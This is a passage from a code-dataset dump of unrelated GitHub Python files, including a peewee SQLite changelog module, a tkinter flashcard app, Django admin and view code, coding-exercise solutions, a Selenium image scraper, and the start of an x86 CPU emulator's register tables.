field.column_name\n new = 'NULL' if not use_new else 'NEW.\"%s\"' % column\n old = 'NULL' if not use_old else 'OLD.\"%s\"' % column\n\n if isinstance(field, JSONField):\n # Ensure that values are cast to JSON so that the serialization\n # is preserved when calculating the old / new.\n if use_old: old = 'json(%s)' % old\n if use_new: new = 'json(%s)' % new\n\n col_array.append(\"json_array('%s', %s, %s)\" % (column, old, new))\n\n return ', '.join(col_array)\n\n def trigger_sql(self, model, action, skip_fields=None):\n assert action in self._actions\n use_old = action != 'INSERT'\n use_new = action != 'DELETE'\n cols = self._build_column_array(model, use_old, use_new, skip_fields)\n return self.template % {\n 'table': model._meta.table_name,\n 'action': action,\n 'new_old': 'NEW' if action != 'DELETE' else 'OLD',\n 'primary_key': model._meta.primary_key.column_name,\n 'column_array': cols,\n 'change_table': self.table_name}\n\n def drop_trigger_sql(self, model, action):\n assert action in self._actions\n return self.drop_template % {\n 'table': model._meta.table_name,\n 'action': action}\n\n @property\n def model(self):\n if not hasattr(self, '_changelog_model'):\n class ChangeLog(self.base_model):\n class Meta:\n database = self.db\n table_name = self.table_name\n self._changelog_model = ChangeLog\n\n return self._changelog_model\n\n def install(self, model, skip_fields=None, drop=True, insert=True,\n update=True, delete=True, create_table=True):\n ChangeLog = self.model\n if create_table:\n ChangeLog.create_table()\n\n actions = list(zip((insert, update, delete), self._actions))\n if drop:\n for _, action in actions:\n self.db.execute_sql(self.drop_trigger_sql(model, action))\n\n for enabled, action in actions:\n 
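# Install a trigger only for the actions the caller enabled; stale ones were dropped above.\n            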
if enabled:\n sql = self.trigger_sql(model, action, skip_fields)\n self.db.execute_sql(sql)\n","repo_name":"coleifer/peewee","sub_path":"playhouse/sqlite_changelog.py","file_name":"sqlite_changelog.py","file_ext":"py","file_size_in_byte":4793,"program_lang":"python","lang":"en","doc_type":"code","stars":10454,"dataset":"github-code","pt":"31"} +{"seq_id":"70272426010","text":"import csv\r\nimport tkinter as tk\r\n\r\nclass FlashcardGUI:\r\n def __init__(self, master):\r\n self.master = master\r\n self.flashcards = []\r\n self.current_card = 0\r\n self.create_widgets()\r\n self.load_flashcards()\r\n\r\n def create_widgets(self):\r\n # Create a canvas widget for the flashcard\r\n self.flashcard_canvas = tk.Canvas(self.master, width=500, height=300, bg='white')\r\n self.flashcard_canvas.grid(row=0, column=0, columnspan=2)\r\n\r\n # Question label\r\n self.question_label = tk.Label(self.flashcard_canvas, text=\"\", bg='white')\r\n self.flashcard_canvas.create_window(250, 150, window=self.question_label)\r\n\r\n # Answer label\r\n self.answer_label = tk.Label(self.flashcard_canvas, text=\"\", bg='white')\r\n self.flashcard_canvas.create_window(250, 150, window=self.answer_label)\r\n\r\n # Flashcard rectangle\r\n self.flashcard_rect = self.flashcard_canvas.create_rectangle(50, 50, 450, 250, outline='black', width=2)\r\n\r\n # Flip button\r\n self.flip_button = tk.Button(self.master, text=\"Flip\", command=self.flip_card)\r\n self.flip_button.grid(row=1, column=0)\r\n\r\n # Next button\r\n self.next_button = tk.Button(self.master, text=\"Next\", command=self.next_card)\r\n self.next_button.grid(row=1, column=1)\r\n\r\n # Add button\r\n self.add_button = tk.Button(self.master, text=\"Add\", command=self.add_card)\r\n self.add_button.grid(row=2, column=0)\r\n\r\n # Question entry\r\n self.question_text = tk.Label(self.master, text=\"Question:\")\r\n self.question_text.grid(row=3, column=0, sticky='w')\r\n self.question_entry = tk.Entry(self.master)\r\n self.question_entry.grid(row=3, column=1, sticky='nsew')\r\n\r\n # Answer entry\r\n self.answer_text = tk.Label(self.master, text=\"Answer:\")\r\n self.answer_text.grid(row=4, column=0, sticky='w')\r\n self.answer_entry = tk.Entry(self.master)\r\n self.answer_entry.grid(row=4, column=1, sticky='nsew')\r\n\r\n # Set resize behavior\r\n self.master.columnconfigure(0, weight=1)\r\n self.master.rowconfigure(0, weight=1)\r\n\r\n def load_flashcards(self):\r\n with open('flashcards.csv') as flashcards_file:\r\n flashcards_reader = csv.reader(flashcards_file)\r\n for row in flashcards_reader:\r\n self.flashcards.append(row)\r\n\r\n self.show_question()\r\n\r\n def show_question(self):\r\n self.question_label.configure(text=self.flashcards[self.current_card][0])\r\n self.answer_label.configure(text=\"\")\r\n self.flashcard_canvas.coords(self.question_label, 250, 120)\r\n self.flashcard_canvas.itemconfigure(self.flashcard_rect, state='normal')\r\n self.flashcard_canvas.lift(self.flashcard_rect)\r\n self.flashcard_canvas.lift(self.question_label)\r\n self.flip_button.configure(text=\"Flip\")\r\n\r\n def show_answer(self):\r\n self.answer_label.configure(text=self.flashcards[self.current_card][1])\r\n self.flashcard_canvas.coords(self.answer_label, 250, 180)\r\n self.flashcard_canvas.lift(self.answer_label)\r\n self.flip_button.configure(text=\"Flip back\")\r\n\r\n def flip_card(self):\r\n if self.answer_label[\"text\"] == \"\":\r\n self.show_answer()\r\n else:\r\n self.show_question()\r\n\r\n def next_card(self):\r\n self.current_card = (self.current_card + 1) 
% len(self.flashcards)\r\n        self.show_question()\r\n\r\n    def add_card(self):\r\n        question = self.question_entry.get().strip()\r\n        answer = self.answer_entry.get().strip()\r\n\r\n        if question and answer:\r\n            with open('flashcards.csv', mode='a', newline='') as flashcards_file:\r\n                flashcards_writer = csv.writer(flashcards_file)\r\n                flashcards_writer.writerow([question, answer])\r\n            self.flashcards.append([question, answer])\r\n            self.question_entry.delete(0, tk.END)\r\n            self.answer_entry.delete(0, tk.END)\r\n            self.current_card = len(self.flashcards) - 1\r\n            self.show_question()\r\n\r\n    def clear_entries(self):\r\n        self.question_entry.delete(0, tk.END)\r\n        self.answer_entry.delete(0, tk.END)\r\n\r\nif __name__ == \"__main__\":\r\n    root = tk.Tk()\r\n    root.title(\"Flashcards\")\r\n\r\n    app = FlashcardGUI(root)\r\n\r\n    root.mainloop()\r\n","repo_name":"Tech-Wizz/flashcards","sub_path":"flashcard.py","file_name":"flashcard.py","file_ext":"py","file_size_in_byte":4399,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"29832337394","text":"from django.contrib import admin\nfrom .models import CustomUser\n\n# Actions for CustomUser Model admin panel\n@admin.action(description='Deactivate selected user accounts')\ndef deactivate_account(modeladmin, request, queryset):\n    for user in queryset:\n        user.is_active = False\n        user.save()\n    \nclass CustomUserAdmin(admin.ModelAdmin):\n\tlist_display = ('pk', 'username', 'first_name', 'last_name', 'email', 'user_type', 'last_login', 'is_active')\n\tlist_filter = ('user_type', 'is_active')\n\tsearch_fields = ('username', 'email', 'first_name', 'last_name')\n\tactions = [deactivate_account]\n\nadmin.site.register(CustomUser, CustomUserAdmin)\n","repo_name":"madnan12/Pytutor","sub_path":"users/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"20740971380","text":"#https://www.codewars.com/kata/57cc975ed542d3148f00015b/train/python\n\n#NotCorrect\ndef check(seq, elem):\n    nE = False\n    for i in range(len(seq)-1):\n        if isinstance(seq[i], int) == True:\n            nE = True\n        \n        else:\n            nE = False\n            break\n    \n    if nE == True: \n        for i in range(len(seq)-1):\n            if elem == seq[i]:\n                return True\n            else:\n                return False\n    \n    if nE == False:\n        for i in range(len(seq)):\n            if str(elem) in str(seq[i]):\n                return True\n            else:\n                return False\n\n#Correct\ndef check(seq, elem):\n    if elem in seq: \n        return True\n    else:\n        return False","repo_name":"GameDesigner111/CodeWarsTasks","sub_path":"YouOnlyNeedOne_Beginner.py","file_name":"YouOnlyNeedOne_Beginner.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73505293209","text":"from django.views.generic import ListView, CreateView\nfrom .models import Car, Goal, Ticket\nfrom .forms import TicketForm\nfrom django.urls import reverse_lazy\nfrom fpdf import FPDF\nfrom django.shortcuts import render, redirect\nimport datetime\n\nclass CarList(ListView):\n\ttemplate_name = 'home/index.html'\n\n\tdef get_context_data(self, **kwargs):\n\t\tcontext = super().get_context_data(**kwargs)\n\t\treturn context\n\n\tdef get_queryset(self):\n\t\ttime = datetime.datetime.now()\n\t\tcars = Car.objects.all()\n\t\tfor s in cars:\n\t\t\t# mark rides unavailable once their full expiry datetime has passed\n\t\t\tif s.expire_time < time:\n\t\t\t\ts.is_avaliable = False\n\t\t\t\ts.save()\n\t\t\telif s.total_chairs == 
0:\n\t\t\t\ts.is_avaliable = False\n\t\t\t\ts.save()\n\t\treturn Car.objects.filter(is_avaliable=True)\n\ndef ticket_create(request, pk):\n\tform = TicketForm()\n\tcontext = {\n\t\t'form' : form\n\t}\n\tcar = Car.objects.get(id=pk)\n\tif request.method == \"POST\":\n\t\tform = TicketForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tticket = form.save(commit=False)\n\t\t\tticket.car = car\n\t\t\tticket.save()\n\t\t\tget_ticket = Ticket.objects.latest('id')\n\t\t\treturn redirect(f\"{get_ticket.ticket_pdf.url}\")\n\treturn render(request, 'home/ticket_form.html', context)\n\n\n","repo_name":"ArsalanHabibi14/Bus-Ticket-Booking-Application","sub_path":"car_system/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70068019929","text":"\"\"\"template_python_django URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.10/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url, include\n\ngrouped_url_patterns = {\n 'base_patterns': [\n url(r'^status/', include('template_python_django.health.urls')),\n ],\n 'template_python_django_patterns': [\n url(r'^template_python_django/', include('template_python_django.api.urls')),\n ],\n}\n\nurlpatterns = [\n url\n for pattern_list\n in grouped_url_patterns.values()\n for url\n in pattern_list\n]\n","repo_name":"Amsterdam/template_python_django","sub_path":"src/template_python_django/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29880009572","text":"# The collatz sequence\n\ndef collatz(number):\n if number == 1:\n return 1\n if number % 2 == 0:\n print(number // 2)\n return collatz(number // 2)\n else:\n print(number * 3 + 1)\n return collatz(number * 3 + 1)\n\ntry:\n userInput = int(input('Pleasea input integer: '))\n collatz(userInput)\n\nexcept ValueError:\n print('The number must be integer')\n\n\n","repo_name":"aerialboundaries/python_practice","sub_path":"automate/chap3-collatz.py","file_name":"chap3-collatz.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"34095231416","text":"# -*- coding: utf-8 -*-\r\n\r\nimport sys\r\nfrom io import StringIO\r\nimport unittest\r\nimport numpy as np\r\n\r\ndef resolve():\r\n # read data for n sequences.\r\n temp = sys.stdin.readline().split()\r\n N, M = np.asarray(temp).astype(int)\r\n temp = sys.stdin.readline().split()\r\n a = np.asarray(temp).astype(int)\r\n \r\n sumvotes = np.sum(a)\r\n \r\n c = 0; OUT = False\r\n for data in a:\r\n if data >= sumvotes/(4*M):\r\n c += 1\r\n if c >= M:\r\n OUT = True\r\n #break\r\n \r\n if OUT:\r\n print(\"Yes\")\r\n else:\r\n print(\"No\")\r\n \r\n\r\nclass TestClass(unittest.TestCase):\r\n def assertIO(self, input, output):\r\n stdout, stdin = sys.stdout, sys.stdin\r\n 
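# Redirect stdio so resolve() reads the test input and its output is captured for comparison.\r\n        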
sys.stdout, sys.stdin = StringIO(), StringIO(input)\r\n resolve()\r\n sys.stdout.seek(0)\r\n out = sys.stdout.read()[:-1]\r\n sys.stdout, sys.stdin = stdout, stdin\r\n self.assertEqual(out, output)\r\n def test_入力例_1(self):\r\n input = \"\"\"4 1\r\n5 4 2 1\"\"\"\r\n output = \"\"\"Yes\"\"\"\r\n self.assertIO(input, output)\r\n def test_入力例_2(self):\r\n input = \"\"\"3 2\r\n380 19 1\"\"\"\r\n output = \"\"\"No\"\"\"\r\n self.assertIO(input, output)\r\n def test_入力例_3(self):\r\n input = \"\"\"12 3\r\n4 56 78 901 2 345 67 890 123 45 6 789\"\"\"\r\n output = \"\"\"Yes\"\"\"\r\n self.assertIO(input, output)\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n \r\n unittest.main()","repo_name":"kentaroy47/atcoder","sub_path":"abc161/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"14139600920","text":"import time\nimport requests\nimport urllib.request\nimport cv2\nimport numpy as np\nimport os\n \nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\n\noptions = webdriver.ChromeOptions()\noptions.add_argument('headless')\noptions.add_argument('window-size=1920x1080')\noptions.add_argument(\"disable-gpu\")\nbrowser = webdriver.Chrome('D:\\Python\\driver\\chromedriver_win32\\chromedriver.exe', chrome_options=options)\n\ndef neg_img(word):\n url = 'https://www.google.co.kr/search?q=' + word + '&tbm=isch'\n browser.get(url)\n elem = browser.find_element_by_tag_name(\"body\") \n\n no = 5\n while no:\n elem.send_keys(Keys.PAGE_DOWN)\n time.sleep(0.3)\n no -= 1\n \n cnt = 1\n img_list = list()\n img = browser.find_elements_by_class_name(\"rg_ic\")\n\n for i in img:\n img_list.append(i.get_attribute(\"src\"))\n\n for i in img_list:\n try:\n print(i)\n urllib.request.urlretrieve(i, \"act/\" + str(cnt) + \".jpg\")\n # img = cv2.imread(\"act/\" + str(cnt) + \".jpg\", cv2.IMREAD_GRAYSCALE)\n # resized_image = cv2.resize(img, (100, 100))\n # cv2.imwrite(\"act/\"+str(cnt)+\".jpg\", img)\n cnt += 1\n except Exception as e:\n print(str(e))\n\ndef pos_img():\n url = 'https://www.google.co.kr/search?q=남자+배우&tbm=isch'\n browser.get(url)\n elem = browser.find_element_by_tag_name(\"body\") \n \n no = 4\n while no:\n elem.send_keys(Keys.PAGE_DOWN)\n time.sleep(0.3)\n no -= 1\n\n cnt = 1\n img_list = list()\n img = browser.find_elements_by_class_name(\"rg_ic\")\n\n for i in img:\n img_list.append(i.get_attribute(\"src\"))\n\n for i in img_list:\n try:\n print(i)\n urllib.request.urlretrieve(i, \"pos/\" + str(cnt) + \".jpg\")\n img = cv2.imread(\"pos/\" + str(cnt) + \".jpg\", cv2.IMREAD_GRAYSCALE)\n # resized_image = cv2.resize(img, (100, 100))\n cv2.imwrite(\"pos/\"+str(cnt)+\".jpg\", img)\n cnt += 1\n except Exception as e:\n print(str(e))\n\ndef create_pos_n_neg():\n for file_type in ['neg', 'pos']:\n for img in os.listdir(file_type):\n if file_type == 'pos':\n line = file_type + '/' + img + '\\n'\n with open('positives.txt', 'a') as f:\n f.write(line)\n elif file_type == 'neg':\n line = file_type+'/'+img+'\\n'\n with open('negatives.txt', 'a') as f:\n f.write(line)\n","repo_name":"bobbohee/gui-img-crawling","sub_path":"img_crawling.py","file_name":"img_crawling.py","file_ext":"py","file_size_in_byte":2287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"38669751269","text":"# coding: utf-8\nimport os\nimport sys\nimport copy\n#import register\n\n\nclass memory():\n def __init__(self,k64): # mem=64k*64\n 
'''\n if 64KB : k64 = 1\n if 640KB : k64 = 10\n if 1MB : k64 = 16\n if 1GB : k64 = 16384\n '''\n self.segment=65536\n memorysize = self.segment*k64\n self._memory = [0 for i in range(0,memorysize)]\n self.memmax = memorysize-1 #final address\n print('memmax={0}'.format(self.memmax))\n\n def set(self,addr,v):\n self._memory[addr] = v & 0xff\n\n def get(self,addr):\n return self._memory[addr]\n\n\nclass cpu():\n def msg(str):\n print(str)\n pass\n\n def dbgp(str):\n #print(str)\n pass\n\n # define register label\n rax_=0\n eax_=1\n ax_=2\n ah_=3\n al_=4\n\n rcx_=5\n ecx_=6\n cx_=7\n ch_=8\n cl_=9\n\n rdx_=10\n edx_=11\n dx_=12\n dh_=13\n dl_=14\n\n rbx_=15\n ebx_=16\n bx_=17\n bh_=18\n bl_=19\n\n rsp_=20\n esp_=21\n sp_=22\n spl_=23\n\n rbp_=24\n ebp_=25\n bp_=26\n bpl_=27\n\n rsi_=28\n esi_=29\n si_=30\n sil_=31\n\n rdi_=32\n edi_=33\n di_=34\n dil_=35\n\n mm0_=36\n mm1_=37\n mm2_=38\n mm3_=39\n mm4_=40\n mm5_=41\n mm6_=42\n mm7_=43\n\n xmm0_=44\n xmm1_=45\n xmm2_=46\n xmm3_=47\n xmm4_=48\n xmm5_=49\n xmm6_=50\n xmm7_=51\n xmm8_=52\n xmm9_=53\n xmm10_=54\n xmm11_=55\n xmm12_=56\n xmm13_=57\n xmm14_=58\n xmm15_=59\n\n r8_=60\n r8d_=61\n r8w_=62\n r8b_=63\n\n r9_=64\n r9d_=65\n r9w_=66\n r9b_=67\n\n r10_=68\n r10d_=69\n r10w_=70\n r10b_=71\n\n r11_=72\n r11d_=73\n r11w_=74\n r11b_=75\n\n r12_=76\n r12d_=77\n r12w_=78\n r12b_=79\n\n r13_=80\n r13d_=81\n r13w_=82\n r13b_=83\n\n r14_=84\n r14d_=85\n r14w_=86\n r14b_=87\n\n r15_=88\n r15d_=89\n r15w_=90\n r15b_=91\n\n es_=92\n cs_=93\n ss_=94\n ds_=95\n fs_=96\n gs_=97\n\n cr0_=98\n cr1_=99 #invd\n cr2_=100\n cr3_=101\n cr4_=102\n cr5_=103 #invd\n cr6_=104 #invd\n cr7_=105 #invd\n cr8_=106\n\n dr0_=107\n dr1_=108\n dr2_=109\n dr3_=110\n dr4_=111\n dr5_=112\n dr6_=113\n dr7_=114\n INVD=115\n RESERVED=116\n NREG=115\n\n r_rax=0\n r_rcx=1\n r_rdx=2\n r_rbx=3\n r_rsp=4\n r_rbp=5\n r_rsi=6\n r_rdi=7\n\n r_mm0=8\n r_mm1=9\n r_mm2=10\n r_mm3=11\n r_mm4=12\n r_mm5=13\n r_mm6=14\n r_mm7=15\n\n r_xmm0=16\n r_xmm1=17\n r_xmm2=18\n r_xmm3=19\n r_xmm4=20\n r_xmm5=21\n r_xmm6=22\n r_xmm7=23\n r_xmm8=24\n r_xmm9=25\n r_xmm10=26\n r_xmm11=27\n r_xmm12=28\n r_xmm13=29\n r_xmm14=30\n r_xmm15=31\n\n r_r8=32\n r_r9=33\n r_r10=34\n r_r11=35\n r_r12=36\n r_r13=37\n r_r14=38\n r_r15=39\n\n r_es=40\n r_cs=41\n r_ss=42\n r_ds=43\n r_fs=44\n r_gs=45\n\n r_cr0=46\n r_cr1=47 #invd\n r_cr2=48\n r_cr3=49\n r_cr4=50\n r_cr5=51 #invd\n r_cr6=52 #invd\n r_cr7=53 #invd\n r_cr8=54\n\n r_dr0=55\n r_dr1=56\n r_dr2=57\n r_dr3=58\n r_dr4=59\n r_dr5=60\n r_dr6=61\n r_dr7=62\n\n r_INDV=63\n r_RESERVED=64\n r_NREG=63\n\n # resource type\n RTr8=0 # AL\n RTrH=1 # AH\n RTr16=2 # AX\n RTr32=3 # EAX\n RTr64=4 # RAX\n RTr128=6 # XMM\n\n regp=[\n # realreg , rtype , name\n [r_rax, RTr64,'rax_'], #0 rax\n [r_rax, RTr32,'eax_'],\n [r_rax, RTr16,'ax_'],\n [r_rax, RTrH ,'ah_'],\n [r_rax, RTr8 ,'al_'],\n [r_rcx, RTr64,'rcx_'], #5 rcx\n [r_rcx, RTr32,'ecx_'],\n [r_rcx, RTr16,'cx_'],\n [r_rcx, RTrH ,'ch_'],\n [r_rcx, RTr8 ,'cl_'],\n [r_rdx, RTr64,'rdx_'], #10 rdx\n [r_rdx, RTr32,'edx_'],\n [r_rdx, RTr16,'dx_'],\n [r_rdx, RTrH ,'dh_'],\n [r_rdx, RTr8 ,'dl_'],\n [r_rbx, RTr64,'rbx_'], #15 rbx\n [r_rbx, RTr32,'ebx_'],\n [r_rbx, RTr16,'bx_'],\n [r_rbx, RTrH ,'bh_'],\n [r_rbx, RTr8 ,'bl_'],\n [r_rsp, RTr64,'rsp_'], #20 rsp\n [r_rsp, RTr32,'esp_'],\n [r_rsp, RTr16,'sp_'],\n [r_rsp, RTr8 ,'spl_'],\n [r_rbp, RTr64,'rbp_'], #24 rbp\n [r_rbp, RTr32,'ebp_'],\n [r_rbp, RTr16,'bp_'],\n [r_rbp, RTr8 ,'bpl_'],\n [r_rsi, RTr64,'rsi_'], #28 rsi\n [r_rsi, RTr32,'esi_'],\n [r_rsi, RTr16,'si_'],\n [r_rsi, RTr8 
,'sil_'],\n        [r_rdi, RTr64,'rdi_'], #32 rdi\n        [r_rdi, RTr32,'edi_'],\n        [r_rdi, RTr16,'di_'],\n        [r_rdi, RTr8 ,'dil_'],\n        [r_mm0, RTr64,'mm0_'], #36 mm0\n        [r_mm1, RTr64,'mm1_'],\n        [r_mm2, RTr64,'mm2_'],\n        [r_mm3, RTr64,'mm3_'],\n        [r_mm4, RTr64,'mm4_'],\n        [r_mm5, RTr64,'mm5_'],\n        [r_mm6, RTr64,'mm6_'],\n        [r_mm7, RTr64,'mm7_'],\n        [r_xmm0,RTr128,'xmm0_'], #44 xmm0\n        [r_xmm1,RTr128,'xmm1_'],\n        [r_xmm2,RTr128,'xmm2_'],\n        [r_xmm3,RTr128,'xmm3_'],\n        [r_xmm4,RTr128,'xmm4_'],\n        [r_xmm5,RTr128,'xmm5_'],\n        [r_xmm6,RTr128,'xmm6_'],\n        [r_xmm7,RTr128,'xmm7_'],\n        [r_xmm8,RTr128,'xmm8_'],\n        [r_xmm9,RTr128,'xmm9_'],\n        [r_xmm10,RTr128,'xmm10_'],\n        [r_xmm11,RTr128,'xmm11_'],\n        [r_xmm12,RTr128,'xmm12_'],\n        [r_xmm13,RTr128,'xmm13_'],\n        [r_xmm14,RTr128,'xmm14_'],\n        [r_xmm15,RTr128,'xmm15_'],\n        [r_r8 , RTr64 ,'r8_'], #60 r8\n        [r_r8 , RTr32 ,'r8d_'],\n        [r_r8 , RTr16 ,'r8w_'],\n        [r_r8 , RTr8 ,'r8b_'],\n        [r_r9 , RTr64 ,'r9_'], #64 r9\n        [r_r9 , RTr32 ,'r9d_'],\n        [r_r9 , RTr16 ,'r9w_'],\n        [r_r9 , RTr8 ,'r9b_'],\n        [r_r10, RTr64 ,'r10_'], #68 r10\n        [r_r10, RTr32 ,'r10d_'],\n        [r_r10, RTr16 ,'r10w_'],\n        [r_r10, RTr8 ,'r10b_'],\n        [r_r11, RTr64 ,'r11_'], #72 r11\n        [r_r11, RTr32 ,'r11d_'],\n        [r_r11, RTr16 ,'r11w_'],\n        [r_r11, RTr8 ,'r11b_'],\n        [r_r12, RTr64 ,'r12_'], #76 r12\n        [r_r12, RTr32 ,'r12d_'],\n        [r_r12, RTr16 ,'r12w_'],\n        [r_r12, RTr8 ,'r12b_'],\n        [r_r13, RTr64 ,'r13_'], #80 r13\n        [r_r13, RTr32 ,'r13d_'],\n        [r_r13, RTr16 ,'r13w_'],\n        [r_r13, RTr8 ,'r13b_'],\n        [r_r14, RTr64 ,'r14_'], #84 r14\n        [r_r14, RTr32 ,'r14d_'],\n        [r_r14, RTr16 ,'r14w_'],\n        [r_r14, RTr8 ,'r14b_'],\n        [r_r15, RTr64 ,'r15_'], #88 r15\n        [r_r15, RTr32 ,'r15d_'],\n        [r_r15, RTr16 ,'r15w_'],\n        [r_r15, RTr8 ,'r15b_'],\n        [r_es , RTr16 ,'es_'], #92 es\n        [r_cs , RTr16 ,'cs_'], #93\n        [r_ss , RTr16 ,'ss_'], #94\n        [r_ds , RTr16 ,'ds_'], #95\n        [r_fs , RTr16 ,'fs_'], #96\n        [r_gs , RTr16 ,'gs_'], #97\n        [r_cr0 , RTr32 ,'cr0_'],\n        [r_cr1 , RTr32 ,'cr1_'], #invd\n        [r_cr2 , RTr32 ,'cr2_'],\n        [r_cr3 , RTr32 ,'cr3_'],\n        [r_cr4 , RTr32 ,'cr4_'],\n        [r_cr5 , RTr32 ,'cr5_'], #invd\n        [r_cr6 , RTr32 ,'cr6_'], #invd\n        [r_cr7 , RTr32 ,'cr7_'], #invd\n        [r_cr8 , RTr32 ,'cr8_'],\n        [r_dr0 , RTr32 ,'dr0_'],\n        [r_dr1 , RTr32 ,'dr1_'],\n        [r_dr2 , RTr32 ,'dr2_'],\n        [r_dr3 , RTr32 ,'dr3_'],\n        [r_dr4 , RTr32 ,'dr4_'],\n        [r_dr5 , RTr32 ,'dr5_'],\n        [r_dr6 , RTr32 ,'dr6_'],\n        [r_dr7 , RTr32 ,'dr7_']\n    ]\n\n    r2reg=[0 for x in range(0, r_NREG)]\n    x=0\n    for y in range(0, NREG):\n        if regp[y][0] != x:\n            x += 1\n            r2reg[x] = y\n\n    mod1164 = [\n        [ # rex.b = 0\n            [ # rax\n                al_,None,\n                ax_ ,\n                eax_ ,\n                rax_ ,\n                mm0_ ,\n                xmm0_ ,\n                es_ ,\n                cr0_ ,\n                dr0_\n            ] ,\n            [ # rcx\n                cl_ , None,\n                cx_ ,\n                ecx_ ,\n                rcx_ ,\n                mm1_ ,\n                xmm1_ ,\n                cs_ ,\n                INVD ,\n                dr1_\n            ] ,\n            [ # rdx_\n                dl_ , None,\n                dx_ ,\n                edx_ ,\n                rdx_ ,\n                mm2_ ,\n                xmm2_ ,\n                ss_ ,\n                cr2_ ,\n                dr2_\n            ] ,\n            [ # rbx_\n                bl_ , None,\n                bx_ ,\n                ebx_ ,\n                rbx_ ,\n                mm3_ ,\n                xmm3_ ,\n                ds_ ,\n                cr3_ ,\n                dr3_\n            ] ,\n            [ # rsp_\n                spl_ , None, #@16 ah_\n                sp_ ,\n                esp_ ,\n                rsp_ ,\n                mm4_ ,\n                xmm4_ ,\n                fs_ ,\n                cr4_ ,\n                dr4_\n            ] ,\n            [ # rbp_\n                bpl_ , None, #@16 ch_\n                bp_ ,\n                ebp_ ,\n                rbp_ ,\n                mm5_ ,\n                xmm5_ ,\n                gs_ ,\n                INVD ,\n                dr5_\n            ] ,\n            [ # rsi_\n                sil_ , None, #@16 dh_\n                si_ ,\n                esi_ ,\n                rsi_ ,\n                mm6_ ,\n                xmm6_ ,\n                RESERVED ,\n                INVD ,\n                dr6_\n            ] ,\n            [ # rdi_\n                dil_ , None, #@16 bh_\n                di_ ,\n                edi_ ,\n                rdi_ ,\n                mm7_ ,\n                xmm7_ ,\n                RESERVED ,\n                INVD ,\n                dr7_\n            ]\n        ] ,\n        [ # rex.b = 1\n            [ # r8\n                r8b_, None,\n                r8w_ ,\n                r8d_ ,\n                r8_ ,\n                mm0_ ,\n                xmm8_ ,\n                es_ ,\n                cr8_ ,\n                INVD\n            ] ,\n            [ # r9\n                r9b_ , None,\n                r9w_ ,\n                r9d_ ,\n                r9_ ,\n                mm1_ ,\n                xmm9_ ,\n                cs_ ,\n                INVD ,\n                INVD\n            
] ,\n            [ # r10_\n                r10b_ , None,\n                r10w_ ,\n                r10d_ ,\n                r10_ ,\n                mm2_ ,\n                xmm10_ ,\n                ss_ ,\n                INVD ,\n                INVD\n            ] ,\n            [ # r11\n                r11b_ , None,\n                r11w_ ,\n                r11d_ ,\n                r11_ ,\n                mm3_ ,\n                xmm11_ ,\n                ds_ ,\n                INVD ,\n                INVD\n            ] ,\n            [ # r12_\n                r12b_ , None,\n                r12w_ ,\n                r12d_ ,\n                r12_ ,\n                mm4_ ,\n                xmm12_ ,\n                fs_ ,\n                INVD ,\n                INVD\n            ] ,\n            [ # r13\n                r13b_ , None,\n                r13w_ ,\n                r13d_ ,\n                r13_ ,\n                mm5_ ,\n                xmm13_ ,\n                gs_ ,\n                INVD ,\n                INVD\n            ] ,\n            [ # r14\n                r14b_ , None,\n                r14w_ ,\n                r14d_ ,\n                r14_ ,\n                mm6_ ,\n                xmm14_ ,\n                RESERVED ,\n                INVD ,\n                INVD ,\n            ] ,\n            [ # r15\n                r15b_ , None,\n                r15w_ ,\n                r15d_ ,\n                r15_ ,\n                mm7_ ,\n                xmm15_ ,\n                RESERVED ,\n                INVD ,\n                INVD ,\n            ]\n        ]\n    ]\n\n    mod1116 = copy.deepcopy(mod1164)\n    mod1116[0][r_rsp][RTr8] = ah_\n    mod1116[0][r_rbp][RTr8] = ch_\n    mod1116[0][r_rsi][RTr8] = dh_\n    mod1116[0][r_rdi][RTr8] = bh_\n\n    ID=2**21 #Identification Flag\n    VIP=2**20 #Virtual Interrupt Pending\n    VIF=2**19 #Virtual Interrupt\n    AC=2**18 #Alignment check\n    VM=2**17 #Virtual8086 mode\n    RF=2**16 #Resume Flag\n    NT=2**14 #Nested Task\n    IOPL13=2**13 #I/O Privilege Level\n    IOPL12=2**12\n    OF=2**11 #status:overflow\n    DF=2**10 #control:direction\n    IF=2**9 #control:interrupt\n    TF=2**8 #control:trap\n    SF=2**7 #status:sign\n    ZF=2**6 #status:zero\n    AF=2**4 #status:auxiliary carry\n    PF=2**2 #status:parity\n    CF=2**0 #status:carry\n\n    maskRG=0b00111000\n    shftG=3\n    maskRM=0b00000111\n    maskMB=0b11000000\n    shftM=6\n\n    mask=[\n        0x00000000000000FF , #RTr8\n        0x00000000000000FF , #RTrH\n        0x000000000000FFFF , #RTr16\n        0x00000000FFFFFFFF , #RTr32\n        0xFFFFFFFFFFFFFFFF , 